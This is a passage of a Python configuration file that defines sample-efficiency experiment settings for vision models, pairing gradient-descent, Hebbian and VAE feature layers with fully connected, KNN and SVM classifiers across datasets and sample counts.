P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_gdes_layer_ft[' + str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
prec_on_gdes_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None,
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds],
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1,
P.KEY_CRIT_METRIC_MANAGER: 'neurolab.optimization.metric.PrecMetricManager',
P.KEY_SKCLF_NUM_SAMPLES: tot_trn_samples[ds],
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: samples_per_class[ds],
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/config_base_gdes[' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
prec_on_gdes_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None,
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds],
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1,
P.KEY_CRIT_METRIC_MANAGER: 'neurolab.optimization.metric.PrecMetricManager',
P.KEY_SKCLF_NUM_SAMPLES: tot_trn_samples[ds],
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: samples_per_class[ds],
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_gdes_layer_ft[' + str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
knn_on_gdes_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: 10,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/config_base_gdes[' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
knn_on_gdes_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: 10,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_gdes_layer_ft[' + str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
svm_on_gdes_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.SVMClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/config_base_gdes[' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
svm_on_gdes_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.SVMClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_gdes_layer_ft[' + str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
for lrn_rule in lrn_rules:
gdes_fc_on_hebb_layer[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.gdes.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: 5e-4,
P.KEY_DROPOUT_P: 0.5,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/hebb/config_base_hebb[' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
gdes_fc_on_hebb_layer_ft[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net', 'models.gdes.fc.Net'],
P.KEY_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/hebb/config_base_hebb[' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_NET_OUTPUTS: ['bn' + str(l), 'fc'],
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_BATCHSIZE: 64,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: l2_penalties[ds],
P.KEY_DROPOUT_P: 0.5,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_ALPHA: 0.,
}
hebb_fc_on_hebb_layer[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.hebb.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/hebb/config_base_hebb[' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
hebb_fc_on_hebb_layer_ft[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.hebb.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_hebb_layer_ft[' + str(l) + '_' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
prec_on_hebb_layer_ft[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_WHITEN: None if lrn_rule != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds],
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1,
P.KEY_CRIT_METRIC_MANAGER: 'neurolab.optimization.metric.PrecMetricManager',
P.KEY_SKCLF_NUM_SAMPLES: tot_trn_samples[ds],
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: samples_per_class[ds],
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_hebb_layer_ft[' + str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
knn_on_hebb_layer[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: 10,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/hebb/config_base_hebb[' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
knn_on_hebb_layer_ft[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: 10,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision//smpleff/gdes_fc_on_hebb_layer_ft[' + str(l) + '_' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
svm_on_hebb_layer[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.SVMClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/hebb/config_base_hebb[' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
svm_on_hebb_layer_ft[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.SVMClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_hebb_layer_ft[' + str(l) + '_' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
gdes_fc_on_vae_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.gdes.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: 5e-4,
P.KEY_DROPOUT_P: 0.5,
P.KEY_PRE_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/vae/config_base_vae[' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
gdes_fc_on_vae_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: ['models.gdes.vae_' + str(num_layers[ds]) + 'l.Net', 'models.gdes.fc.Net'],
P.KEY_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/vae/config_base_vae[' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_NET_OUTPUTS: ['bn' + str(l), 'fc'],
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
